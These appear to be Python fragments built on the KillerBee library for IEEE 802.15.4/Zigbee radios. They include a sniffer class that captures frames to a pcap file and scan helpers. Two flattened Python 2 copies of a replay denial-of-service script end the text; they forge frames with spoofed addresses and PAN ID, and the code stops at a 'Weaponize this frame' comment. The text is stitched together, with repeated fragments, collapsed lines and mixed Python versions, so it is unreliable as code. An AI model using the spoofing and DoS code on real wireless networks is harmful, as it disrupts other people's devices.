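class zigbeeSniffer(Sniffer):
    """Sniffer that records IEEE 802.15.4 frames from one KillerBee device to a pcap file.

    ``options`` is unpacked as ``(name, device, nbpkts, channel)``:

    * ``name``    -- sniffer name; ``'zigbee'`` is used when it is ``None``.
    * ``device``  -- indexable collection of device identifiers; only the first
      entry is used.
    * ``nbpkts``  -- the capture loop stops once this many packets were written.
    * ``channel`` -- channel number passed to ``KillerBee.set_channel`` (page 0).
    """

    def __init__(self, options):
        """Open the KillerBee device and tune it to the requested channel.

        Exits the process with status 1 when ``set_channel`` rejects the
        channel with a ``ValueError``.
        """
        name, self.device, self.nbpkts, self.channel = options
        if name is None:
            name = 'zigbee'
        if len(self.device) != 1:
            print(f'[i] This sniffer can handle only one device at the same time. This sniffer will use the device {self.device[0]}')
        self.device = self.device[0]
        Sniffer.__init__(self, name)
        # NOTE(review): the capture holds raw over-the-air traffic and is written
        # to a fixed path inside one user's home directory. Make the destination
        # configurable and keep the file readable only by the capturing user.
        self.outputFile = '/home/jnt/zigbee.pcap'
        # Buffer that receives everything printed inside the capture loop.
        self.redirect = io.StringIO()
        self.kb = KillerBee(self.device)
        try:
            self.kb.set_channel(self.channel, 0)
        except ValueError as e:
            # The exception must be converted explicitly: 'ERROR:' + e raised a
            # TypeError, which hid the real message and skipped the exit.
            print('ERROR:' + str(e))
            # SystemExit is what exit() raises, without relying on the site module.
            raise SystemExit(1)

    def run(self):
        """Capture packets into ``self.outputFile`` until ``nbpkts`` is reached.

        The loop also ends when ``self.terminated()`` returns true. The radio
        is switched off again even when the capture aborts with an exception.
        """
        packetcount = 0
        self.kb.sniffer_on()
        try:
            # Create a PCAP dumper to write packets to a pcap
            with PcapDumper(DLT_IEEE802_15_4, self.outputFile, ppi=False) as pd:
                rf_freq_mhz = self.kb.frequency(self.channel, 0) / 1000.0
                print("zbwireshark: listening on \'{0}\', channel {1}, page {2} ({3} MHz), link-type DLT_IEEE802_15_4, capture size 127 bytes".format(self.kb.get_dev_info()[0], self.channel, 0, rf_freq_mhz))
                try:
                    while self.nbpkts != packetcount:
                        # Anything printed inside this block lands in self.redirect.
                        with redirect_stdout(self.redirect):
                            if self.terminated():
                                print(f"{self.name} is quitting")
                                break
                            # Wait for the next packet
                            packet = self.kb.pnext()
                            if packet is not None:
                                packetcount += 1
                                pd.pcap_dump(packet['bytes'], ant_dbm=packet['dbm'], freq_mhz=rf_freq_mhz)
                except IOError as e:
                    # errno 32 is a broken pipe (the reader went away); that is
                    # treated as a normal end of capture, anything else is re-raised.
                    if e.errno != 32:
                        raise
        finally:
            # Always release the radio, including on unexpected errors.
            self.kb.sniffer_off()
        print("{0} packets captured".format(packetcount))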
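def startScan(zbdb, currentGPS, verbose=False, dblog=False, agressive=False):
    """Open the default KillerBee device; report USB errors and return False.

    Only the device-opening step is visible in this excerpt. The other
    parameters are not used by the lines shown here.
    """
    try:
        kb = KillerBee()
    except usb.USBError as e:
        # Match on str(e) rather than e.args[0].find(...): args[0] is not
        # guaranteed to be a string (it may be an errno), and calling .find on
        # it would raise AttributeError inside the error handler.
        if 'Operation not permitted' in str(e):
            # NOTE(review): granting the user access to the USB device (for
            # example through a udev rule) keeps the tool from running as root.
            print('Error: Permissions error, try running using sudo.')
        else:
            print('Error: USBError: %s' % (e,))
        return False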
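def __init__(self, options):
    """Open the KillerBee device and tune it to the requested channel.

    ``options`` is unpacked as ``(name, device, nbpkts, channel)``. ``name``
    falls back to ``'zigbee'`` when it is ``None``, and only the first entry
    of ``device`` is used. Exits the process with status 1 when
    ``set_channel`` rejects the channel with a ``ValueError``.
    """
    name, self.device, self.nbpkts, self.channel = options
    if name is None:
        name = 'zigbee'
    if len(self.device) != 1:
        print(f'[i] This sniffer can handle only one device at the same time. This sniffer will use the device {self.device[0]}')
    self.device = self.device[0]
    Sniffer.__init__(self, name)
    # NOTE(review): the capture holds raw over-the-air traffic and is written to
    # a fixed path inside one user's home directory. Make the destination
    # configurable and keep the file readable only by the capturing user.
    self.outputFile = '/home/jnt/zigbee.pcap'
    # Buffer intended to receive redirected stdout.
    self.redirect = io.StringIO()
    self.kb = KillerBee(self.device)
    try:
        self.kb.set_channel(self.channel, 0)
    except ValueError as e:
        # The exception must be converted explicitly: 'ERROR:' + e raised a
        # TypeError, which hid the real message and skipped the exit.
        print('ERROR:' + str(e))
        # SystemExit is what exit() raises, without relying on the site module.
        raise SystemExit(1)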
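def startScan(currentGPS, verbose=False, include=[], ignore=None, output='.', scanning_time=5, capture_time=2):
    """Open the default KillerBee device; log and print USB errors, then return False.

    Only the device-opening step is visible in this excerpt. The other
    parameters are not used by the lines shown here.
    """
    # NOTE(review): include=[] is a mutable default shared between calls. It is
    # left unchanged because the code that consumes it is not visible here.
    try:
        kb = KillerBee()
    except USBError as e:
        # Match on str(e) rather than e.args[0].find(...): args[0] is not
        # guaranteed to be a string (it may be an errno), and calling .find on
        # it would raise AttributeError inside the error handler.
        if 'Operation not permitted' in str(e):
            # NOTE(review): granting the user access to the USB device (for
            # example through a udev rule) keeps the tool from running as root.
            log_message = 'Error: Permissions error, try running using sudo.'
        else:
            log_message = 'Error: USBError: {}'.format(e)
        logging.error(log_message)
        print(log_message)
        return False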
def __init__(self, device, datasource=None, gps=None):
    """Initialise the KillerBee base class, then record the device and reset state.

    ``device``, ``datasource`` and ``gps`` are forwarded unchanged to
    ``KillerBee.__init__``. The instance starts without a plugin and inactive.
    """
    KillerBee.__init__(self, device, datasource, gps)
    self.device = device
    # No plugin is attached yet and the instance is not active.
    self.plugin, self.active = None, False
action='store', required=True, type=tohex) parser.add_argument('-d', '--destination', action='store', required=True, type=tohex) parser.add_argument('-q', '--seqnum', action='store', default=200, type=int) args = parser.parse_args() kb = KillerBee(device=args.devstring) if kb is None: raise Exception("Failed to create a KillerBee instance.") try: kb.set_channel(args.channel) except Exception, e: raise Exception('Error: Failed to set channel to %d' % channel, e) scapy = Dot15d4(fcf_frametype="Data") / Dot15d4Data() scapy.seqnum = (args.seqnum + randint(1, 10)) % 255 scapy.src_addr = args.source scapy.dest_addr = args.destination scapy.src_panid = scapy.dest_panid = args.panid print "DoSing packets from sender 0x%04x to destination 0x%04x." % ( scapy.src_addr, scapy.dest_addr)
# Command line main function # clear; sudo python dos_aesctr_replay.py -c 26 -s 3c63 -d 800a -p 1234 if __name__=='__main__': # Command-line arguments parser = argparse.ArgumentParser() tohex = lambda s: int(s.replace(':', ''), 16) parser.add_argument('-f', '--channel', '-c', action='store', dest='channel', required=True, type=int, default=11) parser.add_argument('-i', '--interface', action='store', dest='devstring', default=None) parser.add_argument('-p', '--panid', action='store', required=True, type=tohex) parser.add_argument('-s', '--source', action='store', required=True, type=tohex) parser.add_argument('-d', '--destination', action='store', required=True, type=tohex) parser.add_argument('-q', '--seqnum', action='store', default=200, type=int) args = parser.parse_args() kb = KillerBee(device=args.devstring) if kb is None: raise Exception("Failed to create a KillerBee instance.") try: kb.set_channel(args.channel) except Exception, e: raise Exception('Error: Failed to set channel to %d' % channel, e) scapy = Dot15d4(fcf_frametype="Data")/Dot15d4Data() scapy.seqnum = (args.seqnum + randint(1, 10)) % 255 scapy.src_addr = args.source scapy.dest_addr = args.destination scapy.src_panid = scapy.dest_panid = args.panid print "DoSing packets from sender 0x%04x to destination 0x%04x." % (scapy.src_addr, scapy.dest_addr) # Weaponize this frame for the DoS Attack on AES-CTR